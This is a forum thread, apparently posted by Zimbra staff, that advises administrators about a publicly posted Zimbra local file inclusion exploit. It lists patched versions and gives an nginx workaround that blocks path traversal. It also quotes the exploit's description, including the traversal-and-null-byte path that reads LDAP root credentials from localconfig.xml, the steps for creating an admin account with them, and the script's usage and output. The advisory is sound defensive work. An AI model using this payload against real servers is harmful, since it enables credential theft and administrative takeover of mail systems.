Results 1 to 2 of 2

Thread: Security Guidance for reported "0day Exploit"

Hybrid View

  1. #1
    Join Date
    Dec 2007
    Location
    Ypsilanti, MI
    Posts
    145
    Rep Power
    8

    Default Security Guidance for reported "0day Exploit"

    Overview:
    A reportedly "0day Exploit" was posted on Twitter on Friday, December 06, 2013. However, please note - Zimbra has previously released a fix for this Security bug.

    Release Info:
    This vulnerability was identified in Feb 2013, and a fix released by Zimbra in Feb 2013. The bug number was the following (note: it is locked, so the full details are not currently public):

    Vulnerability about skin/branding feature, sensitive information can be retrieved
    Access Denied
    Fixed: 7.2.2 Patch 2, 7.2.3, 8.0.2 Patch 1, 8.0.3

    A notification for this issue was published to the Zimbra Support Portal on Feb 26, 2013: https://support.zimbra.com/node/346
    Also, a notification was included in these Release Notes:


    8.0.2 Patch 1: http://files2.zimbra.com/website/doc...h_8_0_2_r1.pdf - February 19, 2013: Patch 8.0.2 P1 patch fixes the following bug: Bug 80338 Security Fix
    7.2.2 Patch 2: http://files2.zimbra.com/website/doc...h_7_2_2_r1.pdf - February 19, 2013: Patch 7.2.2 P2 patch fixes the following bug: Bug 80338 Security Fix

    ZCS7 Customers:
    ZCS7 Customers should upgrade to 7.2.2 Patch 2 or later (7.2.5 is the latest, and 7.2.6 will be released in the near future). Customers running these versions should not be vulnerable.

    ZCS8 Customers:
    ZCS8 Customers should upgrade to 8.0.2 Patch 1 or later (8.0.5 is the latest, and 8.0.6 will be released in the near future). Customers running these versions should not be vulnerable.

    Workaround:
    If using Nginx or other proxy, you could use a configuration like the following to some effect:

    You need to add the below 3 lines to
    "nginx.conf.web.[http|https].default.template":

    if ($request_uri ~ "\.\.") {
    return 404;
    }
    if ($request_uri ~ "\%2[eE]\%2[eE]") {
    return 404;
    }

    Then run:

    $ zmproxyconfgen
    $ zmproxyctl restart

    Published Exploit:

    Originally posted to Twitter: https://twitter.com/DigitalCTF

    Zimbra - 0day exploit / Privilegie escalation via LFI

    # Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
    # Date: 06 Dec 2013
    # Exploit Author: rubina119
    # Contact Email : rubina119[at]gmail.com
    # Vendor Homepage: Zimbra offers Open Source email server software and shared calendar for Linux and the Mac.
    # Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
    # Tested on: Centos(x), Ubunutu.
    # CVE : No CVE, no patch just 0Day
    # State : Critical

    # Mirror: http://www.exploit-db.com/sploits/zi..._rubina119.zip

    ---------------Description-----------------

    This script exploits a Local File Inclusion in
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx %20TemplateMsg.js.zgz
    which allows us to see localconfig.xml
    that contains LDAP root credentials wich allow us to make requests in
    /service/admin/soap API with the stolen LDAP credentials to create user
    with administration privlegies
    and gain acces to the Administration Console.

    LFI is located at :
    /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx %20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

    Example :

    https://mail.example.com/res/I18nMsg...Keys,ZmKeys,Zd...

    or

    https://mail.example.com:7071/zimbra...Msg,ZMsg,ZmMsg,...

    ----------------Exploit-----------------
    Before use this exploit, target server must have admin console port open
    "7071" otherwise it won't work.

    use the exploit like this :
    ruby run.rb -t mail.example.com -u someuser -p Test123_23
    [*] Looking if host is vuln....
    [+] Host is vuln exploiting...
    [+] Obtaining Domain Name
    [+] Creating Account
    [+] Elevating Privileges
    [+] Login Credentials[*] Login URL : https://mail.example.com:7071/zimbraAdmin/[*] Account : someuser@example.com[*] Password : Test123_23
    [+] Successfully Exploited !

    The number of servers vuln are huge like 80/100.
    This is only for educational purpouses. (sic)

  2. #2
    Join Date
    Apr 2008
    Posts
    35
    Rep Power
    7

    Default

    Note: there is some additional information here on Investigating and Securing Systems at risk of this exploit:
    https://wiki.zimbra.com/wiki/Investi...curing_Systems

Similar Threads

  1. Java exploit reported today
    By bmw in forum Community News
    Replies: 0
    Last Post: 01-11-2013, 12:36 PM
  2. Replies: 30
    Last Post: 12-09-2010, 05:25 AM
  3. Replies: 0
    Last Post: 01-20-2008, 01:42 PM
  4. Replies: 2
    Last Post: 01-06-2008, 09:49 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •